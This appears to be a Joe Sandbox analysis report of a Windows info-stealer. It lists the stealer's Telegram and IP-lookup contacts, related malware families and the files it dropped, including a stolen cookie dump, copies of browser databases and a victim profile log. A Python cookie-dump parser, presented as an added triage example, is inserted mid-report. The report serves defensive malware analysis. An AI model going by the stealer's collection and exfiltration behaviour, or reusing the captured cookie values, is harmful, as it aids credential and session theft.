  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://duckduckgo.com/ac/?q=
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | 0%, Virustotal; Avira URL Cloud: safe | Reputation: unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | 0%, Virustotal; Avira URL Cloud: safe | Reputation: unknown
http://ns.adobe.
  Source: 765iYbgWn9.exe
  Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://www.ecosia.org/newtab/
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
  Source: 765iYbgWn9.exe, 00000000.00000003.2465497675.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp; 765iYbgWn9.exe, 00000000.00000003.2465923126.0000019C72E68000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false | URL Reputation: safe | Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
195.201.57.90 | ipwho.is | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1483815
Start date and time: 2024-07-29 07:31:11 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 15s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 765iYbgWn9.exe (renamed because the original name is a hash value)
Original Sample Name: 0534ab10184891cd61d262bfd79b7b4c.exe
Detection: MAL
Classification: mal72.troj.spyw.winEXE@4/15@3/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:32:44 | API Interceptor | 4x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context

149.154.167.220
  WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine
  https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20= | malicious | Unknown
  lHqcAkPNu8.exe | malicious | XWorm
  file.exe | malicious | Clipboard Hijacker
  Nursultan Alpha Client.exe | malicious | DCRat, XWorm
  Easy Anti-Cheat Analyzer.exe | malicious | DCRat, XWorm
  encrypthub_steal.ps1 | malicious | Unknown
  encrypthub_steal.ps1 | malicious | Unknown
  QUOTATION_JULQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger
  engine.ps1 | malicious | Unknown

195.201.57.90
  WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | context: /?output=json
  ubes6SC7Vd.exe | malicious | Unknown | context: ipwhois.app/xml/
  cOQD62FceM.exe | malicious | Luca Stealer, Rusty Stealer | context: /?output=json
  Clipper.exe | malicious | Unknown | context: /?output=json
  cOQD62FceM.exe | malicious | Luca Stealer | context: /?output=json
  Cryptor.exe | malicious | Luca Stealer | context: /?output=json
  Cryptor.exe | malicious | Luca Stealer, Rusty Stealer | context: /?output=json
  rust-stealer-xss.exe | malicious | Discord Token Stealer, Luca Stealer | context: /?output=json
  Build.exe | malicious | Luca Stealer, Quasar | context: /?output=json
  rust-stealer-xss.exe | malicious | Luca Stealer, Rusty Stealer | context: /?output=json

Match | Associated Sample Name / URL | Detection | Threat Name | Context

ipwho.is
  WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | context: 195.201.57.90
  1d686b05f745875e28939abe357baedd169b59f5a0d88.exe | malicious | Quasar | context: 195.201.57.90
  http://appinforyvjhf6454ms1a.pages.dev/ | malicious | TechSupportScam | context: 195.201.57.90
  https://l.facebook.com/l.php?u=https%3A%2F%2Fnutramart.store%2F%3Flabel%3D5efe465a4dbe59fbb290a966697fc1cd%26utm_medium%3Dpaid%26utm_source%3Dfb%26utm_id%3D6599688580361%26utm_content%3D6599688599961%26utm_term%3D6599688590961%26utm_campaign%3D6599688580361%26fbclid%3DIwZXh0bgNhZW0BMAABHdzmJULh8TsQt3pW_qnmIXPFdqLqBaBKW5T-aZYxDkCqac1lwtitUH-fNw_aem_UoCoKjZX08yMSHQS1Rk-lA&h=AT2Rbdo290L85DwdtmvCHSaYZeZQw6zVRZwOCmLUor4sXK9slv2_8Xz3sNHtiR9yk_5i3WV0TyI-vvISy2qX4eX89xJtn5joKswTFrWNikf-8BbcY1c3OSbcsV7ioNYHeRE&__tn__=%2CmH-R&c%5B0%5D=AT1zpbOywPCbT61x3IUZxcKH5NMmiyOktbAovmzxAnO3GQxZoE9RLlfDBYeXTFE8UxKMEzW4i7Rw_yO3qxx7WfbLZEKXf2a_gqDGEIqK5xACO326D8DwbL9YKGpFirOaXzMC_oPb4wgEghT5w108ehD0lVOUa18OX2Yna4VvaAaIUpPjAkk9gOhJw0AtcNc8dmXxzoPXiUwIYEI1VCwKUmK1G_lmEdu24Iq9UJ_ic75uGIJuxQwEttfLYZ0HqkC3D8EpDSqIjHE7T12pe_syL5VjKXEGR6hZ3F-YEVJbiZGhU5diMWZAvsPL2bUpvSMNWrEu14yqnXQK7Z-1xnZRSbLWmzHp53sdCj21 | malicious | Unknown | context: 195.201.57.90
  Q2XwE8NRLx.exe | malicious | Quasar | context: 195.201.57.90
  https://kohojoiy.pages.dev/ | malicious | TechSupportScam | context: 195.201.57.90
  http://ofclgtaiopoi.z13.web.core.windows.net | malicious | TechSupportScam | context: 195.201.57.90
  http://ofclgtaiopoi.z13.web.core.windows.net | malicious | TechSupportScam | context: 195.201.57.90
  dzCvoZ0uLj.exe | malicious | Quasar | context: 195.201.57.90
  0p8KrH1qfZ.exe | malicious | Quasar | context: 195.201.57.90

api.telegram.org
  WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | context: 149.154.167.220
  https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20= | malicious | Unknown | context: 149.154.167.220
  lHqcAkPNu8.exe | malicious | XWorm | context: 149.154.167.220
  file.exe | malicious | Clipboard Hijacker | context: 149.154.167.220
  Nursultan Alpha Client.exe | malicious | DCRat, XWorm | context: 149.154.167.220
  Easy Anti-Cheat Analyzer.exe | malicious | DCRat, XWorm | context: 149.154.167.220
  encrypthub_steal.ps1 | malicious | Unknown | context: 149.154.167.220
  encrypthub_steal.ps1 | malicious | Unknown | context: 149.154.167.220
  file.exe | malicious | Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, Stealc, Vidar | context: 149.154.167.220
  QUOTATION_JULQTRA071244#U00b7PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | context: 149.154.167.220

Match | Associated Sample Name / URL | Detection | Threat Name | Context

TELEGRAMRU
  WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | context: 149.154.167.220
  https://bming.cl/readm.html?colors=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20= | malicious | Unknown | context: 149.154.167.220
  https://join-telegram.apl-my.com/virallbn/ | malicious | Unknown | context: 149.154.167.99
  lHqcAkPNu8.exe | malicious | XWorm | context: 149.154.167.220
  file.exe | malicious | Clipboard Hijacker | context: 149.154.167.220
  https://kaslasa.ru/ | malicious | Unknown | context: 149.154.167.99
  https://telegarm-com.icu/ | malicious | Telegram Phisher | context: 149.154.167.99
  Nursultan Alpha Client.exe | malicious | DCRat, XWorm | context: 149.154.167.220
  Easy Anti-Cheat Analyzer.exe | malicious | DCRat, XWorm | context: 149.154.167.220
  encrypthub_steal.ps1 | malicious | Unknown | context: 149.154.167.220

HETZNER-ASDE
  WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | context: 195.201.57.90
  1d686b05f745875e28939abe357baedd169b59f5a0d88.exe | malicious | Quasar | context: 195.201.57.90
  file.exe | malicious | Vidar | context: 5.75.212.60
  SecuriteInfo.com.Win32.Evo-gen.21074.1738.exe | malicious | SmokeLoader | context: 188.40.141.211
  mek_n_bat.bat | malicious | Unknown | context: 78.47.143.65
  file.exe | malicious | Vidar | context: 5.75.212.60
  1lKbb2hF7fYToopfpmEvlyRN.exe | malicious | LummaC, Vidar | context: 5.75.212.60
  file.exe | malicious | Vidar | context: 5.75.212.60
  https://www.formajo.com/bestbuy/fxc/cmVhbGVtYWlsQGppbW15am9obi5jb20= | malicious | HTMLPhisher | context: 88.99.142.215
  IRqsWvBBMc.exe | malicious | Amadey, Vidar | context: 5.75.212.60

Match | Associated Sample Name / URL | Detection | Threat Name | Context

3b5074b1b5d032e5620f69f9f700ff0e (JA3 client fingerprint)
  WfKynArKjH.exe | malicious | AsyncRAT, Luca Stealer, MicroClip, RedLine | context: 149.154.167.220
  http://pub-a29070233cb54ef393c1ddea471f903c.r2.dev/index.html | malicious | Unknown | context: 149.154.167.220
  https://gdhddyyyu-yfdrfs-f48b55.ingress-earth.ewp.live/wp-content/plugins/ddrxmis/pages/region.php | malicious | Unknown | context: 149.154.167.220
  https://metamaskuh.azurewebsites.net/ | malicious | Unknown | context: 149.154.167.220
  http://pub-63ee9e97e9eb46d78c12a9137fdc4d90.r2.dev/invoice.htm | malicious | HTMLPhisher | context: 149.154.167.220
  http://pub-58a4baf41c124648bdc4fe772188accd.r2.dev/index.html | malicious | Unknown | context: 149.154.167.220
  http://pub-40cb77b4a6d84294bfa2db6a96f70ff7.r2.dev/index.html | malicious | Unknown | context: 149.154.167.220
  http://www.capitalonebnks.com/ | malicious | Unknown | context: 149.154.167.220
  http://pub-8198ef94712a43e5a05e0ea8720214fd.r2.dev/oblivionauth%5D.html | malicious | HTMLPhisher | context: 149.154.167.220
  http://pub-d8b66a320d00484cb05b1813b55f7739.r2.dev/index.html | malicious | HTMLPhisher | context: 149.154.167.220
                                No context
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllul3nqth:NllUa
                                MD5:851531B4FD612B0BC7891B3F401A478F
                                SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e.................................&..............@..........
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                Category:dropped
                                Size (bytes):20480
                                Entropy (8bit):0.6732424250451717
                                Encrypted:false
                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.121297215059106
                                Encrypted:false
                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):286
                                Entropy (8bit):5.7588025104123
                                Encrypted:false
                                SSDEEP:6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
                                MD5:07691E9F2983932701060D0FC5588075
                                SHA1:878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
                                SHA-256:7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
                                SHA-512:399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
                                Malicious:false
                                Reputation:low
                                Preview:.google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
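The dropped file above is the stealer's cookie dump in the tab-delimited Netscape cookies.txt layout (domain, include-subdomains flag, path, secure flag, expiry, name, value), except that the expiry column carries Chrome's raw expires_utc value, i.e. microseconds since 1601-01-01 UTC, rather than Unix seconds. The parser below is an added example for triaging such a dump; it is not part of the Joe Sandbox report or of the malware. The sample records are reconstructed from the preview on the assumption that the '.' placeholders the report prints for non-printable bytes are the tabs and CRLFs of that format; everything else (function names, the 10**15 threshold used to tell WebKit microseconds from Unix seconds) is the example's own.

```python
"""Parse a stealer cookie dump and convert WebKit/Chrome expiry timestamps.

Added example, not sandbox or malware code. SAMPLE is constructed from the
report preview above, assuming its '.' placeholders were tabs and CRLFs.
"""
from datetime import datetime, timedelta, timezone

# Constructed sample: the two records visible in the dropped file's preview.
SAMPLE = (
    ".google.com\tfalse\t/\ttrue\t13343492415760663\t1P_JAR\t2023-10-04-13\r\n"
    ".google.com\ttrue\t/\ttrue\t13356711615760707\tNID\t511=Ef5vPFGw-MZYo5hwe-"
    "0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377"
    "UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-"
    "F-6wOg4\r\n"
)

# Chrome stores cookie expiry as microseconds since the Windows FILETIME epoch.
WEBKIT_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

FIELDS = ("domain", "include_subdomains", "path", "secure", "expires", "name", "value")


def webkit_to_datetime(microseconds):
    """Convert a Chrome expires_utc value to an aware UTC datetime."""
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


def parse_expiry(field):
    """Accept either raw WebKit microseconds (what this dump contains) or plain
    Unix seconds (what a browser-exported cookies.txt contains). WebKit values
    are around 1.3e16, Unix-second values around 1.7e9, so a 1e15 cut-off
    (assumed here) separates them unambiguously."""
    value = int(field)
    if value > 10**15:
        return webkit_to_datetime(value)
    return datetime.fromtimestamp(value, tz=timezone.utc)


def parse_cookie_dump(text):
    """Return one dict per well-formed record; malformed lines are skipped so a
    partially written or truncated dump still yields the rows it does contain."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split("\t")
        if len(parts) != len(FIELDS):
            continue
        rec = dict(zip(FIELDS, parts))
        rec["include_subdomains"] = rec["include_subdomains"].lower() == "true"
        rec["secure"] = rec["secure"].lower() == "true"
        rec["expires"] = parse_expiry(rec["expires"])
        records.append(rec)
    return records


def live_cookies(records, now):
    """Cookies still valid at `now` (an aware datetime); the ones an attacker
    could actually replay, which is what matters when scoping the exposure."""
    return [r for r in records if r["expires"] > now]


if __name__ == "__main__":
    for rec in parse_cookie_dump(SAMPLE):
        print(f'{rec["domain"]:<14} {rec["name"]:<8} secure={rec["secure"]!s:<5} '
              f'expires={rec["expires"]:%Y-%m-%d %H:%M:%S} UTC')
```

Converting the expiry is what turns the dump into something actionable: it tells you which of the stolen session cookies were still valid at the time of the theft and therefore need to be invalidated server-side, rather than merely rotated at the next login.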
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                Category:dropped
                                Size (bytes):871537
                                Entropy (8bit):7.514704598714351
                                Encrypted:false
                                SSDEEP:24576:CV53qeJntUG1huJkE1+aRbRakFLzNwIsD:0aAUuUJkca0LzaX
                                MD5:AA43214E4801C2C9253D5F68B0231B97
                                SHA1:4771334945A1589C57833402A07C4FC3B65C539F
                                SHA-256:D038F18DEECB9F377378920662C27925CD6FEE9BF53B44C992AB9558EB42884E
                                SHA-512:D211904CC780F2EF69846FC05D52DBEA0F89BDFBEB5618B9BA9F08070F6D7560A0037AD6D96295B277FEECD9D83D92BFA43CC584A73323801DD726B4CD7DE382
                                Malicious:false
                                Reputation:low
                                Preview:.PNG........IHDR................C..L8IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):14970
                                Entropy (8bit):7.837007680406016
                                Encrypted:false
                                SSDEEP:384:yJx9yyyyytjnN8/WpHwbnVCUkWZJx9yyyyytjnN8/WpHwbnVCUkWwPYLNDWhizzU:GyByM2nnV2WPyByM2nnV2WLuR
                                MD5:5F9275C16D8ED763D29E2CC5B75E6B6C
                                SHA1:310D9B1006B17D4EDE2AB8E0749287A7F1F1DCC9
                                SHA-256:1425B5292C8380929470CB0C28A02876724D2201EE1938EFD9CDF891797CE227
                                SHA-512:4322E6CAC1608B4B8DD5A62F909A77E8B17C3618AF630D67A926C06BA72AAE9FC4BF451C3C825328FAC875B04E3EF9AD74B7C0395E221388660A80E89141914B
                                Malicious:false
                                Preview:PK.........;.X.-%U............IVHSHTCODI.pdf.SIv@!......YDq..?H.1!.8.L..h.mb!..daF..}..)...I..i.EP...8.&....d...+..(...;.X.rv\..;&.[gl.u......d'.....r..R0..o...... ....9).$%.....Z..~.^..q..*.C}....k..F..;z...q.\.vUKx6.wi.i.w!y..mw.6..dN..M...q2.Q#Z..^%.0%.XJ2FE..W:.y.;....;....@..-f(.#i1.s.S.n.Q..._SI..o.Z..*.a..3.)0.....Lo.c...-...*.......n;.V..[.../.O....DS.\j..o......0.\..YW....;.e^.U.f..?....(2...-.:.p.T:.....C.;....Ot...0..&..p..,@..wlG.unvS........oh...I.Q=..:fh..0.S..st`NR..b...]..J.D|.[9x...b...I.1..!..`..n...?N.{.m. ...65.}OPz..m..GV..s.8:....LVk..{B.a?.2..}...+.A.+........>.%....J....l..d.......1...u.O....@;L.UQ..w'OS..o...<.o............PK.........;.X1...............JDSOXXXWOA.docx.RGr@!..g&...bE.r...g..k.hG=..p..j.[.G(q.....2.me.T.]g..6..9......v..Zc1\.S.S1[.p.Ex.M.O..N.....A..4.iTP..u...0..4S....|.,.....^.sgv...u,....WF.fj..$<..'`.r\.F0.dN.H ...u7........tQ.f.f..i.p\.'%.y...S.....y.....:p6A.%EH......-./.^.s~..UB..C,.-6.=C9...53.
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                                Category:dropped
                                Size (bytes):709
                                Entropy (8bit):5.345983040943533
                                Encrypted:false
                                SSDEEP:12:eM3lAQN3oi23w/7QQ8bjx6Y5rrJFolQM7NlVagBQM3aWflIHdAMij01mMXaBLSEW:eaNYv3w/7QxxVXHM7NlVage8lOAMijUP
                                MD5:B362356B204A8ECC14C12FAA4B9BBED5
                                SHA1:F65F5D37C4694609C6B80C8D074C6DD79482CE50
                                SHA-256:5ADDC95EF2A73F42515A44BAE378EB02291B5AB3B288EDC28CA76FB4CCE56FC6
                                SHA-512:2D82B85969794EE435B55E1822FF05BAFFBF6422C8F0E608EFF36B437787E10DDEE71EC1CABD7ABB505101A8B7ECA9BF8E723632EC546F3C410F49C01FB3D18C
                                Malicious:false
                                Preview:..- IP Info -....IP: 8.46.123.33..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -04:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: EC6CD_O6G (1280, 1024)..HWID: 5229958482931895..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\765iYbgWn9.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -.....Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 20...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: .......Tagged URLs: ....Tagged Cookies: .......Tags Passwords: .....Tags Cookies:
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):155648
                                Entropy (8bit):0.5407252242845243
                                Encrypted:false
                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                MD5:7B955D976803304F2C0505431A0CF1CF
                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                Malicious:false
                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):51200
                                Entropy (8bit):0.8746135976761988
                                Encrypted:false
                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\765iYbgWn9.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                Category:dropped
                                Size (bytes):196608
                                Entropy (8bit):1.121297215059106
                                Encrypted:false
                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                Malicious:false
                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
